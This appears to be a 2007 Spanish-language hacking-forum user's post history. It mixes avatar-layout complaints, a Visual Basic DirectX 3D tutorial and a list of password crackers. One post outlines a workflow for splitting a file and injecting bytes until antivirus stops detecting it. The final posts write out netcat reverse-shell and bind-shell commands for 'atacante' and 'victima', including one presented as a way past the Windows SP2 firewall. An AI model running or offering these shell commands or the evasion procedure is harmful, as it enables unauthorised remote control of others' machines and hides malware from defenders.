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Mensajes - WHK

#4471
Mi resolución es de 1024 x 768 ... creo que esa resolución es la que casi todo el mundo tiene.


  • Servidores : 2048 x 1024
  • Usuario de casa: 1024 x 768
  • Ciber cafes : 800 X 600

Ademas con mi propuesta tu avatar quedaría asi como lo pusiste tu pero mas corto limitando solamente el scroll de abajo sin el del costado como me aparece a mi.
#4472
Estaría bueno hacer todo eso en un solo programa.
Partir el archivo automaticamente en muchas partes iguales dependiendo el tamaño original preconfigurando todo para despues darle en "Start"
Normalmente los archivos se parten con el olly (me lo enseñó octalh), y despues se escanea parte por parte para ver cuales son detectados importando la base de datos de variados antivirus como me mostraron acá:



y luego injectar bites vacios como lo hace el topo:



Puedes hacer algo así como el SSS cuando le das la ip y te hace todo solo...

Divide -> Escanea -> {los detectados: Injecta -> Escanea nuevamente -> [si aún es detectado buelve a dividirse y se debuelve a escanear y asi sucesivamente hasta que ya no es detectado y luego...][si no es detectado continua con la proxima parte detectada]} -> une

PD:
CitarDemasiado complicado, se quedará a medias...  2 (28.6%)
:xD no te tienen confianza jajajaja obiamente si mad expuso esta propuesta es porque lo hará y no quedará  a medias.
#4473
Se valen los arranques de tipo boot como el rootkit eyebot o el virus Wyx que se alojan sobre el anillo 0 para ser ejecutados sobre la memoria al arranque de win?
#4474
Si se han fijado solo se limita el ancho del avatar y si se supera lo permitido entonces se te añade un scrollbar abajo... Porque tambien aparece uno al costado si por mas largo que sea siempre tiene el mismo tamaño?

Por ejemplo:
http://foro.elhacker.net/index.php/topic,164718.0.html
Acá se puede ver que el avatar de octalh solo supera el ancho pero se agregó un scrollbar a un costado ocultando el nombre.
Si ven acá:
http://foro.elhacker.net/index.php/topic,162515.15.html
El avatar de myeptemozo. tiene el mismo tamaño del scroll derecho y solo cambia el de abajo por uno mayor.



Si se fijan también en este post:
http://foro.elhacker.net/index.php/topic,163799.15.html
El avatar de nhaalclkiemr es uno de los menos largos y aún así le asignaron un scroll al costado jajajajaja:




Mi propuesta es: Se puede eliminar el scroll que se ve en el costado del avatar?... podría dejarse solamente el de abajo.
#4476
Hacking / Re: Necesitas una contraseña?
14 Mayo 2007, 23:19 PM
La idea de este post era que el usuario común pudiera obtener contraseñas con un solo click sin romperse la cabeza... si hablamos de crackear u otras formas de obtener un pass ya no sería lo mismo porque al parecer eso del cracking y la fuerza bruta está un poco betado para poder postearlo  :-\
Pero de todas formas The Crack, John the ripper, Brute by Prometheus y muchos otros mas son una buena alternativa para crackear de diferentes maneras ya sea por diccionario o por fuerza bruta... Newhack, Accumul, Hades, VMSCrack........ cientos y cientos de programas alternativos, pero no voy a profundizar en eso.
#4477
Ok no sabia. Alguien puede borrar este post porque yo no puedo. Grax.
#4478
Bueno... encontré un tuto muy bueno que quiero compartir con ustedes
http://rapidshare.com/files/30851743/Dise_o_3D.rar
Explica como manejar el directx con VB para juegos o lo que sea.. estan bien chulos... aya va una sola parte de 10 en total:

Dim Anglex As Single
Dim Angley As Single
Dim Anglez As Single


Dim Dx As DirectX8
Dim D3D As Direct3D8
Dim D3DDevice As Direct3DDevice8
Dim Dx8 As New D3DX8
Dim BanderaDeSalida As Boolean

Const FVF_LVERTEX = (D3DFVF_XYZ Or D3DFVF_TEX1)

Private Type LITVERTEX
    X As Single
    Y As Single
    Z As Single
    tU As Single
    tV As Single
End Type

Dim CubeVerts(0 To 35) As LITVERTEX ' para nuestro cubo

Dim vbCube As Direct3DVertexBuffer8 ' el buffer de vertices para nuestro cubo

Dim matProj As D3DMATRIX ' matrices que nos ayudaran en los calculos
Dim matView As D3DMATRIX
Dim matWorld As D3DMATRIX

Dim textura As Direct3DTexture8

Const PI = 3.14159
Const RAD = PI / 180
Const DEG = 180 / PI

' InicializarDX
Public Function InicializarDX(hwnd As Long) As Boolean
    On Error GoTo ErrHandler:

    Dim DispMode As D3DDISPLAYMODE ' describe nuestro modo de visualizacion
    Dim tmpDispMode As D3DDISPLAYMODE ' variable temporal
    Dim D3DWindow As D3DPRESENT_PARAMETERS ' describe nuestro Viewport
    Dim I As Long ' para el ciclo de recorrido en los modos
   
    Set Dx = New DirectX8
    Set D3D = Dx.Direct3DCreate() ' creamos una interface 3D
   
    '#######################
    '##  PANTALLA COMPLETA #
    '#######################
    For I = 0 To D3D.GetAdapterModeCount(0) - 1 ' lista los modos del adaptador primario en l debugger
        D3D.EnumAdapterModes 0, I, tmpDispMode
        Debug.Print tmpDispMode.Width & " x " & tmpDispMode.Height & " x " & tmpDispMode.Format
    Next I
   
    DispMode.Format = CheckDisplayMode(640, 480, 32)
    Debug.Print "CHECKDISP(640,480,32) = ", DispMode.Format, D3DFMT_UNKNOWN
    If DispMode.Format > D3DFMT_UNKNOWN Then
        '640x480x32 si se soporta
        Debug.Print "USANDO Modo 640x480x32"
        DispMode.Width = 640: DispMode.Height = 480
    Else
        DispMode.Format = CheckDisplayMode(640, 480, 16)
        If DispMode.Format > D3DFMT_UNKNOWN Then
            '640x480x16 si se soporta
            Debug.Print "USANDO modo 640x480x16"
            DispMode.Width = 640: DispMode.Height = 480
        Else
            ' hmm... tienes una tarjeta de video extraña
            MsgBox "Tu hardware no parece soportar el modo de video:" _
                        & " 640x480 pixels con 16 bit o 32 bit de color. Terminando..." _
                        , vbInformation, "Error"
            Unload Me
            End
           
        End If
    End If
   
    D3DWindow.BackBufferCount = 1
    D3DWindow.Windowed = False
    D3DWindow.BackBufferFormat = DispMode.Format
    D3DWindow.BackBufferWidth = DispMode.Width
    D3DWindow.BackBufferHeight = DispMode.Height
    D3DWindow.hDeviceWindow = hwnd ' aqui va nuestra ventana
    D3DWindow.AutoDepthStencilFormat = D3DFMT_D16
    D3DWindow.EnableAutoDepthStencil = True
    D3DWindow.SwapEffect = D3DSWAPEFFECT_COPY_VSYNC
   
    ' aqui creamos nuestro dispositivo 3D
    Set D3DDevice = D3D.CreateDevice(D3DADAPTER_DEFAULT, D3DDEVTYPE_HAL, _
                                                        hwnd, _
                                                        D3DCREATE_SOFTWARE_VERTEXPROCESSING, _
                                                            D3DWindow)
    InicializarDX = True ' exito
    Exit Function
   
ErrHandler:
    Debug.Print "Codigo de error: " & Err.Number, Err.Description
    InicializarDX = False
End Function

Public Sub Render()
    ' limpiamos el backbuffer y tambien el Z buffer
    D3DDevice.Clear 0, ByVal 0, D3DCLEAR_TARGET Or D3DCLEAR_ZBUFFER, D3DColorRGBA(30, 30, 30, 255), 1#, 0

    D3DDevice.BeginScene

    ' aqui especificamos como se renderizan las texturas,
    ' en este caso para la stage 0 que es la que estamos
    ' utilizando. escogemos la textura a utilizar:
    D3DDevice.SetTexture 0, textura
    ' indicamos que el color se toma desde el argumento 1
    D3DDevice.SetTextureStageState 0, D3DTSS_COLOROP, D3DTOP_SELECTARG1
    ' indicamos que el argumento 1 es la textura
    D3DDevice.SetTextureStageState 0, D3DTSS_COLORARG1, D3DTA_TEXTURE
   
    D3DDevice.SetVertexShader FVF_LVERTEX

        '## METODO DE RENDERIZACION 2 ##
        '## este metodo usa el buffer de vertices sin indices
    D3DDevice.SetStreamSource 0, vbCube, Len(CubeVerts(0))
    D3DDevice.DrawPrimitive D3DPT_TRIANGLELIST, 0, 12
   
    D3DDevice.EndScene

    ' Presentamos los resultados(flip)
    D3DDevice.Present ByVal 0, ByVal 0, 0, ByVal 0
End Sub

Private Sub InicializaEscena()
    ' configuramos nuestro dispositivo
    D3DDevice.SetVertexShader FVF_LVERTEX ' indicamos que tipo de vertice estamos usando
    D3DDevice.SetRenderState D3DRS_LIGHTING, False  ' deshabilitamos iluminacion
    D3DDevice.SetRenderState D3DRS_ZENABLE, True ' habilitamos el Z-buffer
    D3DDevice.SetRenderState D3DRS_CULLMODE, D3DCULL_NONE ' especificamos NO ocultamiento
   
    ' las siguientes dos lineas especifican que filtro
    ' se utilizan para el manejo de texturas, el especificado
    ' D3DTEXF_LINEAR da un mejor aspecto, pero disminuye
    ' el perfomance, puedes utilizar D3DTEXF_POINT que tiene
    ' menos calidad pero es mas rapido
    D3DDevice.SetTextureStageState 0, D3DTSS_MAGFILTER, D3DTEXF_LINEAR
    D3DDevice.SetTextureStageState 0, D3DTSS_MINFILTER, D3DTEXF_LINEAR
   
    Set textura = Dx8.CreateTextureFromFile(D3DDevice, App.Path + "\textura.bmp")
    If textura Is Nothing Then Exit Sub
   
    'configuramos las matrices
   
    ' la World Matrix
    D3DXMatrixIdentity matWorld
    D3DDevice.SetTransform D3DTS_WORLD, matWorld 'commit this matrix to the device
   
    ' la matriz de vista
    D3DXMatrixLookAtLH matView, MakeVector(0, 5, 0), MakeVector(0, 0, 0), MakeVector(0, 0, 1)
    D3DDevice.SetTransform D3DTS_VIEW, matView
   
    ' matriz de proyeccion
    D3DXMatrixPerspectiveFovLH matProj, PI / 3, 1, 0.1, 75
    D3DDevice.SetTransform D3DTS_PROJECTION, matProj

    ' definimos los vertices del cubo
    'top
        CubeVerts(0) = CreateLitVertex(-1, 1, -1, 0, 1#)
        CubeVerts(1) = CreateLitVertex(1, 1, -1, 1#, 1#)
        CubeVerts(2) = CreateLitVertex(-1, 1, 1, 0, 0)
       
        CubeVerts(3) = CreateLitVertex(1, 1, -1, 1#, 1#)
        CubeVerts(4) = CreateLitVertex(1, 1, 1, 1#, 0)
        CubeVerts(5) = CreateLitVertex(-1, 1, 1, 0, 0)
       
    'bottom
        CubeVerts(6) = CreateLitVertex(-1, -1, -1, 0, 1#)
        CubeVerts(7) = CreateLitVertex(1, -1, -1, 1#, 1#)
        CubeVerts(8) = CreateLitVertex(-1, -1, 1, 0, 0)
       
        CubeVerts(9) = CreateLitVertex(1, -1, -1, 1#, 1#)
        CubeVerts(10) = CreateLitVertex(1, -1, 1, 1#, 0)
        CubeVerts(11) = CreateLitVertex(-1, -1, 1, 0, 0)
   
    'left
        CubeVerts(12) = CreateLitVertex(-1, 1, -1, 1, 0)
        CubeVerts(13) = CreateLitVertex(-1, 1, 1, 0, 0)
        CubeVerts(14) = CreateLitVertex(-1, -1, -1, 1, 1)
       
        CubeVerts(15) = CreateLitVertex(-1, 1, 1, 0, 0)
        CubeVerts(16) = CreateLitVertex(-1, -1, 1, 0, 1)
        CubeVerts(17) = CreateLitVertex(-1, -1, -1, 1, 1)
   
    'right
        CubeVerts(18) = CreateLitVertex(1, 1, -1, 1, 0)
        CubeVerts(19) = CreateLitVertex(1, 1, 1, 0, 0)
        CubeVerts(20) = CreateLitVertex(1, -1, -1, 1, 1)
       
        CubeVerts(21) = CreateLitVertex(1, 1, 1, 0, 0)
        CubeVerts(22) = CreateLitVertex(1, -1, 1, 0, 1)
        CubeVerts(23) = CreateLitVertex(1, -1, -1, 1, 1)
   
    'front
        CubeVerts(24) = CreateLitVertex(-1, 1, 1, 0, 0)
        CubeVerts(25) = CreateLitVertex(1, 1, 1, 1, 0)
        CubeVerts(26) = CreateLitVertex(-1, -1, 1, 0, 1)
       
        CubeVerts(27) = CreateLitVertex(1, 1, 1, 1, 0)
        CubeVerts(28) = CreateLitVertex(1, -1, 1, 1, 1)
        CubeVerts(29) = CreateLitVertex(-1, -1, 1, 0, 1)
   
    'back
        CubeVerts(30) = CreateLitVertex(-1, 1, -1, 0, 0)
        CubeVerts(31) = CreateLitVertex(1, 1, -1, 1, 0)
        CubeVerts(32) = CreateLitVertex(-1, -1, -1, 0, 1)
       
        CubeVerts(33) = CreateLitVertex(1, 1, -1, 1, 0)
        CubeVerts(34) = CreateLitVertex(1, -1, -1, 1, 1)
        CubeVerts(35) = CreateLitVertex(-1, -1, -1, 0, 1)
       
' creamos el buffer de vertices del cubo
    Set vbCube = D3DDevice.CreateVertexBuffer(Len(CubeVerts(0)) * 36, D3DUSAGE_WRITEONLY, FVF_LVERTEX, D3DPOOL_MANAGED)
    If vbCube Is Nothing Then Debug.Print "ERROR: no se pudo crear el buffer de vertices": Exit Sub
   
    D3DVertexBuffer8SetData vbCube, 0, Len(CubeVerts(0)) * 36, 0, CubeVerts(0)
   
End Sub

Private Function CreateLitVertex(X As Single, Y As Single, Z As Single, tU As Single, tV As Single) As LITVERTEX
    CreateLitVertex.X = X
    CreateLitVertex.Y = Y
    CreateLitVertex.Z = Z
    CreateLitVertex.tU = tU
    CreateLitVertex.tV = tV
End Function

Private Function MakeVector(X As Single, Y As Single, Z As Single) As D3DVECTOR
    MakeVector.X = X: MakeVector.Y = Y: MakeVector.Z = Z
End Function

Private Function CheckDisplayMode(Width As Long, Height As Long, Depth As Long) As CONST_D3DFORMAT
    Dim I As Long
    Dim DispMode As D3DDISPLAYMODE
   
    For I = 0 To D3D.GetAdapterModeCount(0) - 1
        D3D.EnumAdapterModes 0, I, DispMode
        If DispMode.Width = Width Then
            If DispMode.Height = Height Then
                If DispMode.Format = D3DFMT_R5G6B5 Or D3DFMT_X1R5G5B5 Or D3DFMT_X4R4G4B4 Then
                    '16 bit mode
                        If Depth = 16 Then
                            CheckDisplayMode = DispMode.Format
                            Exit Function
                        End If
                ElseIf DispMode.Format = D3DFMT_R8G8B8 Or D3DFMT_X8R8G8B8 Then
                    '32bit mode
                        If Depth = 32 Then
                            CheckDisplayMode = DispMode.Format
                            Exit Function
                        End If
                End If
            End If
        End If
    Next I
CheckDisplayMode = D3DFMT_UNKNOWN
End Function


Private Sub Form_Click()
BanderaDeSalida = False
End Sub


Private Sub Form_Load()
Dim matTemp As D3DMATRIX

Me.Show 'nos aseguramos que nuestra ventana es visible

BanderaDeSalida = InicializarDX(FrmMain.hwnd)

InicializaEscena

Anglex = 0
Angley = 0
Anglez = 0

Do While BanderaDeSalida
    D3DXMatrixIdentity matWorld
   
    D3DXMatrixIdentity matTemp
    D3DXMatrixRotationX matTemp, Anglex * RAD
    D3DXMatrixMultiply matWorld, matWorld, matTemp
   
    D3DXMatrixIdentity matTemp
    D3DXMatrixRotationY matTemp, Angley * RAD
    D3DXMatrixMultiply matWorld, matWorld, matTemp
   
    D3DXMatrixIdentity matTemp
    D3DXMatrixRotationZ matTemp, Anglez * RAD
    D3DXMatrixMultiply matWorld, matWorld, matTemp
   
    D3DDevice.SetTransform D3DTS_WORLD, matWorld
   
    Render ' realizamos un nuevo frame
    DoEvents ' tiempo para que Windows "Piense"

Loop 'proximo frame

' borramos y destruimos los objetos creaos
On Error Resume Next
Set textura = Nothing
'Set dx8 = Nothing
Set D3DDevice = Nothing
Set D3D = Nothing
Set Dx = Nothing

' fin
Unload Me
End
End Sub

Private Sub Form_MouseMove(Button As Integer, Shift As Integer, X As Single, Y As Single)
Anglex = Y / 2
Anglez = -X / 2
End Sub


Bueno... con esto hacemos un cubo con textura metalica que gura junto con el mouse en pantalla completa usando el directx.

Fuente: http://www.geocities.com/oswaldovarela/inicial.htm
PD: tratar con mucho cuidado esta web porque geocities cierra el host cuando la visitan mucho por unas horas.

Creo que con esto ya pueden empezar a crear sus propios juegos en 3D  ;D






#4479
Hacking / Re: Jugando con netcat
12 Mayo 2007, 10:08 AM
Definición de una shell acá:
http://es.wikipedia.org/wiki/Int%C3%A9rprete_de_comandos

Uso de una shell acá:
http://www.ignside.net/man/dos/batch.php
http://www.sitiosargentina.com.ar/webmaster/cursos%20y%20tutoriales/COMANDOS_DEL_DOS.htm
http://foro.elhacker.net/index.php/board,64.0.html


Como tomar una shell acá:
http://foro.elhacker.net/index.php/topic,58032.0.html

Jugar con la shell acá:
http://foro.elhacker.net/index.php/topic,159799.0.html

Talves sea necesario crear un nuevo post sobre el manejo de una shelll desde lo mas básico hasta lo más complejo... pero eso será despues por falta de tiempo.
#4480
Hacking / Re: Jugando con netcat
12 Mayo 2007, 09:10 AM
claro.. repetiré las cosas mil y una ves hasta que todos hayan aprendido por muy poco que sepan.

alt 126 ~
alt 124 |
alt 60 <
alt 62 >

netcat pipeado haciendo reverse shell

------------------------------------------------------
atacante:
nc -vv -L -p 80
nc -vv -L -p 25
------------------------------------------------------
victima:
nc xxx.xxx.xxx.xxx 80 | cmd.exe | nc xxx.xxx.xxx.xxx 25 -d
------------------------------------------------------
se enviaran comandos por puerto 80
y se resiviran por puerto 25
de esa manera se pasa al fw de windows SP2
------------------------------------------------------

netcat en reverse shell

------------------------------------------------------
atacante:
nc -vv -L -p 25
------------------------------------------------------
victima:
nc -d -e cmd.exe xxx.xxx.xxx.xxx 25
------------------------------------------------------
Se enviara una reverse shell por el puerto 25
------------------------------------------------------

netcat shell directa

------------------------------------------------------
victima:
nc -L -d -e cmd.exe -p 25
------------------------------------------------------
atacante:
nc xxx.xxx.xxx.xxx 25 -vv
------------------------------------------------------
La victima deja netcat a la escucha por el puerto 25
para que posteriormente el atacante se conecte
------------------------------------------------------